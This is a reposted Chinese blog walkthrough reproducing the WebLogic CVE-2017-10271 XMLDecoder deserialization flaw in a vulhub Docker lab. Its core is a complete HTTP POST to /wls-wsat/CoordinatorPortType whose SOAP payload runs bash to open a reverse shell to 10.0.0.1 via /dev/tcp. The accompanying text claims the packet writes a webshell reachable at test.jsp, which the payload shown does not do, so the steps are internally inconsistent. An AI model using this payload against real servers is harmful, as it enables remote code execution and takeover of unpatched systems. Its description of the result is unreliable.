Weblogic(CVE-2017-10271)漏洞复现

Posted 妄安

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Weblogic(CVE-2017-10271)漏洞复现相关的知识,希望对你有一定的参考价值。

Weblogic < 10.3.6 \'wls-wsat\' XMLDecoder 反序列化漏洞(CVE-2017-10271

WeblogicWLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

 

影响版本

 

weblogic 版本:

10.3.6.0.0
12.2.1.1.0
12.2.1.2.0
12.1.3.0.0

 

环境搭建:可直接下载并安装环境

git clone git://github.com/vulhub/vulhub.git
cd vulhub/weblogic/CVE-2017-10271/
docker-compose up -d

 

等待一段时间,访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动。

 

 

 

 

 

漏洞复现

我们访问/wls-wsat/CoordinatorPortType出现如下图可以证明漏洞存在

发送这个包,写入webshell

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/10.0.0.1/21 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

 

 

 

 

 

访问:http://your-ip:7001/bea_wls_internal/test.jsp,漏洞验证成功

 

 

以上是关于Weblogic(CVE-2017-10271)漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章

(CVE-2017-10271 ) Weblogic XMLDecoder 反序列化

weblogic CVE-2017-10271修复教程

Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)

WebLogic中WLS 组件漏洞(CVE-2017-10271)专项检测工具

IDEA debug漏洞第一篇(weblogic,cve-2017-10271)

CVE-2017-10271 XMLDecoder 反序列化